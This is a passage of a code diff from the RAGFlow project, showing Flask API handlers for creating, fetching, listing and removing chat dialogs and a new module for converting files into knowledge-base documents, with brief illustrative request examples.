                "vector_similarity_weight": vector_similarity_weight
            }
            if not DialogService.save(**dia):
                return get_data_error_result(retmsg="Fail to new a dialog!")
            e, dia = DialogService.get_by_id(dia["id"])
            if not e:
                return get_data_error_result(retmsg="Fail to new a dialog!")
            return get_json_result(data=dia.to_json())
        else:
            del req["dialog_id"]
            if "kb_names" in req:
                del req["kb_names"]
            if not DialogService.update_by_id(dialog_id, req):
                return get_data_error_result(retmsg="Dialog not found!")
            e, dia = DialogService.get_by_id(dialog_id)
            if not e:
                return get_data_error_result(retmsg="Fail to update a dialog!")
            dia = dia.to_dict()
            dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
            return get_json_result(data=dia)
    except Exception as e:
        return server_error_response(e)


@manager.route('/get', methods=['GET'])
@login_required
def get():
    dialog_id = request.args["dialog_id"]
    try:
        e, dia = DialogService.get_by_id(dialog_id)
        if not e:
            return get_data_error_result(retmsg="Dialog not found!")
        dia = dia.to_dict()
        dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
        return get_json_result(data=dia)
    except Exception as e:
        return server_error_response(e)


def get_kb_names(kb_ids):
    ids, nms = [], []
    for kid in kb_ids:
        e, kb = KnowledgebaseService.get_by_id(kid)
        if not e or kb.status != StatusEnum.VALID.value:
            continue
        ids.append(kid)
        nms.append(kb.name)
    return ids, nms


@manager.route('/list', methods=['GET'])
@login_required
def list():
    try:
        diags = DialogService.query(
            tenant_id=current_user.id,
            status=StatusEnum.VALID.value,
            reverse=True,
            order_by=DialogService.model.create_time)
        diags = [d.to_dict() for d in diags]
        for d in diags:
            d["kb_ids"], d["kb_names"] = get_kb_names(d["kb_ids"])
        return get_json_result(data=diags)
    except Exception as e:
        return server_error_response(e)


@manager.route('/rm', methods=['POST'])
@login_required
@validate_request("dialog_ids")
def rm():
    req = request.json
    try:
        DialogService.update_many_by_id(
            [{"id": id, "status": StatusEnum.INVALID.value} for id in req["dialog_ids"]])
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)

New version (right-hand column of the diff):

from flask import request
from flask_login import login_required, current_user
from api.db.services.dialog_service import DialogService
from api.db import StatusEnum
from api.db.services.llm_service import TenantLLMService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.user_service import TenantService, UserTenantService
from api import settings
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.utils.api_utils import get_json_result


@manager.route('/set', methods=['POST'])  # noqa: F821
@validate_request("prompt_config")
@login_required
def set_dialog():
    req = request.json
    dialog_id = req.get("dialog_id")
    name = req.get("name", "New Dialog")
    if not isinstance(name, str):
        return get_data_error_result(message="Dialog name must be string.")
    if name.strip() == "":
        return get_data_error_result(message="Dialog name can't be empty.")
    if len(name.encode("utf-8")) > 255:
        return get_data_error_result(message=f"Dialog name length is {len(name)} which is larger than 255")
    description = req.get("description", "A helpful dialog")
    icon = req.get("icon", "")
    top_n = req.get("top_n", 6)
    top_k = req.get("top_k", 1024)
    rerank_id = req.get("rerank_id", "")
    if not rerank_id:
        req["rerank_id"] = ""
    similarity_threshold = req.get("similarity_threshold", 0.1)
    vector_similarity_weight = req.get("vector_similarity_weight", 0.3)
    llm_setting = req.get("llm_setting", {})
    prompt_config = req["prompt_config"]

    if not req.get("kb_ids", []) and not prompt_config.get("tavily_api_key") and "{knowledge}" in prompt_config['system']:
        return get_data_error_result(message="Please remove `{knowledge}` in system prompt since no knowledge base/Tavily used here.")

    for p in prompt_config["parameters"]:
        if p["optional"]:
            continue
        if prompt_config["system"].find("{%s}" % p["key"]) < 0:
            return get_data_error_result(
                message="Parameter '{}' is not used".format(p["key"]))

    try:
        e, tenant = TenantService.get_by_id(current_user.id)
        if not e:
            return get_data_error_result(message="Tenant not found!")
        kbs = KnowledgebaseService.get_by_ids(req.get("kb_ids", []))
        embd_ids = [TenantLLMService.split_model_name_and_factory(kb.embd_id)[0] for kb in kbs]  # remove vendor suffix for comparison
        embd_count = len(set(embd_ids))
        if embd_count > 1:
            return get_data_error_result(message=f'Datasets use different embedding models: {[kb.embd_id for kb in kbs]}"')

        llm_id = req.get("llm_id", tenant.llm_id)
        if not dialog_id:
            dia = {
                "id": get_uuid(),
                "tenant_id": current_user.id,
                "name": name,
                "kb_ids": req.get("kb_ids", []),
                "description": description,
                "llm_id": llm_id,
                "llm_setting": llm_setting,
                "prompt_config": prompt_config,
                "top_n": top_n,
                "top_k": top_k,
                "rerank_id": rerank_id,
                "similarity_threshold": similarity_threshold,
                "vector_similarity_weight": vector_similarity_weight,
                "icon": icon
            }
            if not DialogService.save(**dia):
                return get_data_error_result(message="Fail to new a dialog!")
            return get_json_result(data=dia)
        else:
            del req["dialog_id"]
            if "kb_names" in req:
                del req["kb_names"]
            if not DialogService.update_by_id(dialog_id, req):
                return get_data_error_result(message="Dialog not found!")
            e, dia = DialogService.get_by_id(dialog_id)
            if not e:
                return get_data_error_result(message="Fail to update a dialog!")
            dia = dia.to_dict()
            dia.update(req)
            dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
            return get_json_result(data=dia)
    except Exception as e:
        return server_error_response(e)
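
Example (illustration, not part of the diff): the reworked /dialog/set now requires prompt_config up front, checks that every non-optional parameter appears as a {key} placeholder in the system prompt, and rejects {knowledge} when neither a knowledge base nor a Tavily key is attached. A minimal valid create call, under the same base-URL and auth assumptions as the earlier examples:

    import requests

    payload = {
        "name": "KB assistant",
        "kb_ids": ["<knowledge base id>"],
        "prompt_config": {
            "system": "Answer using the knowledge base below.\n{knowledge}",
            "prologue": "Hi! How can I help?",
            "parameters": [{"key": "knowledge", "optional": False}],
            "empty_response": "Sorry! Nothing relevant was found.",
        },
    }
    r = requests.post(
        "http://localhost:9380/v1/dialog/set",    # assumed mount point
        cookies={"session": "<session cookie>"},  # assumed auth
        json=payload,
    )
    print(r.json())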

@manager.route('/get', methods=['GET'])  # noqa: F821
@login_required
def get():
    dialog_id = request.args["dialog_id"]
    try:
        e, dia = DialogService.get_by_id(dialog_id)
        if not e:
            return get_data_error_result(message="Dialog not found!")
        dia = dia.to_dict()
        dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
        return get_json_result(data=dia)
    except Exception as e:
        return server_error_response(e)


def get_kb_names(kb_ids):
    ids, nms = [], []
    for kid in kb_ids:
        e, kb = KnowledgebaseService.get_by_id(kid)
        if not e or kb.status != StatusEnum.VALID.value:
            continue
        ids.append(kid)
        nms.append(kb.name)
    return ids, nms

@manager.route('/list', methods=['GET'])  # noqa: F821
@login_required
def list_dialogs():
    try:
        diags = DialogService.query(
            tenant_id=current_user.id,
            status=StatusEnum.VALID.value,
            reverse=True,
            order_by=DialogService.model.create_time)
        diags = [d.to_dict() for d in diags]
        for d in diags:
            d["kb_ids"], d["kb_names"] = get_kb_names(d["kb_ids"])
        return get_json_result(data=diags)
    except Exception as e:
        return server_error_response(e)

@manager.route('/rm', methods=['POST'])  # noqa: F821
@login_required
@validate_request("dialog_ids")
def rm():
    req = request.json
    dialog_list = []
    tenants = UserTenantService.query(user_id=current_user.id)
    try:
        for id in req["dialog_ids"]:
            for tenant in tenants:
                if DialogService.query(tenant_id=tenant.tenant_id, id=id):
                    break
            else:
                return get_json_result(
                    data=False, message='Only owner of dialog authorized for this operation.',
                    code=settings.RetCode.OPERATING_ERROR)
            dialog_list.append({"id": id, "status": StatusEnum.INVALID.value})
        DialogService.update_many_by_id(dialog_list)
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)

(One file's diff was suppressed because it is too large.)

api/apps/file2document_app.py, new file, 133 lines (@@ -0,0 +1,133 @@):

#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
#

from pathlib import Path

from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService

from flask import request
from flask_login import login_required, current_user
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.db import FileType
from api.db.services.document_service import DocumentService
from api import settings
from api.utils.api_utils import get_json_result


@manager.route('/convert', methods=['POST'])  # noqa: F821
@login_required
@validate_request("file_ids", "kb_ids")
def convert():
    req = request.json
    kb_ids = req["kb_ids"]
    file_ids = req["file_ids"]
    file2documents = []

    try:
        files = FileService.get_by_ids(file_ids)
        files_set = dict({file.id: file for file in files})
        for file_id in file_ids:
            file = files_set[file_id]
            if not file:
                return get_data_error_result(message="File not found!")
            file_ids_list = [file_id]
            if file.type == FileType.FOLDER.value:
                file_ids_list = FileService.get_all_innermost_file_ids(file_id, [])
            for id in file_ids_list:
                informs = File2DocumentService.get_by_file_id(id)
                # delete
                for inform in informs:
                    doc_id = inform.document_id
                    e, doc = DocumentService.get_by_id(doc_id)
                    if not e:
                        return get_data_error_result(message="Document not found!")
                    tenant_id = DocumentService.get_tenant_id(doc_id)
                    if not tenant_id:
                        return get_data_error_result(message="Tenant not found!")
                    if not DocumentService.remove_document(doc, tenant_id):
                        return get_data_error_result(
                            message="Database error (Document removal)!")
                File2DocumentService.delete_by_file_id(id)

                # insert
                for kb_id in kb_ids:
                    e, kb = KnowledgebaseService.get_by_id(kb_id)
                    if not e:
                        return get_data_error_result(
                            message="Can't find this knowledgebase!")
                    e, file = FileService.get_by_id(id)
                    if not e:
                        return get_data_error_result(
                            message="Can't find this file!")

                    doc = DocumentService.insert({
                        "id": get_uuid(),
                        "kb_id": kb.id,
                        "parser_id": FileService.get_parser(file.type, file.name, kb.parser_id),
                        "parser_config": kb.parser_config,
                        "created_by": current_user.id,
                        "type": file.type,
                        "name": file.name,
                        "suffix": Path(file.name).suffix.lstrip("."),
                        "location": file.location,
                        "size": file.size
                    })
                    file2document = File2DocumentService.insert({
                        "id": get_uuid(),
                        "file_id": id,
                        "document_id": doc.id,
                    })

                    file2documents.append(file2document.to_json())
        return get_json_result(data=file2documents)
    except Exception as e:
        return server_error_response(e)
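
Example (illustration, not part of the diff): /convert re-links files into knowledge bases. Documents previously derived from a file are removed first, folders are expanded to their innermost files, and one document plus one file-to-document link is created per (file, knowledge base) pair. A sketch under the same assumptions as above:

    import requests

    r = requests.post(
        "http://localhost:9380/v1/file2document/convert",  # assumed mount point
        cookies={"session": "<session cookie>"},           # assumed auth
        json={"file_ids": ["<file id>"], "kb_ids": ["<knowledge base id>"]},
    )
    print(r.json()["data"])   # the newly created file-to-document links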

@manager.route('/rm', methods=['POST'])  # noqa: F821
@login_required
@validate_request("file_ids")
def rm():
    req = request.json
    file_ids = req["file_ids"]
    if not file_ids:
        return get_json_result(
            data=False, message='Lack of "Files ID"', code=settings.RetCode.ARGUMENT_ERROR)
    try:
        for file_id in file_ids:
            informs = File2DocumentService.get_by_file_id(file_id)
            if not informs:
                return get_data_error_result(message="Inform not found!")
            for inform in informs:
                if not inform:
                    return get_data_error_result(message="Inform not found!")
                File2DocumentService.delete_by_file_id(file_id)
                doc_id = inform.document_id
                e, doc = DocumentService.get_by_id(doc_id)
                if not e:
                    return get_data_error_result(message="Document not found!")
                tenant_id = DocumentService.get_tenant_id(doc_id)
                if not tenant_id:
                    return get_data_error_result(message="Tenant not found!")
                if not DocumentService.remove_document(doc, tenant_id):
                    return get_data_error_result(
                        message="Database error (Document removal)!")
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
Some files were not shown because too many files have changed in this diff.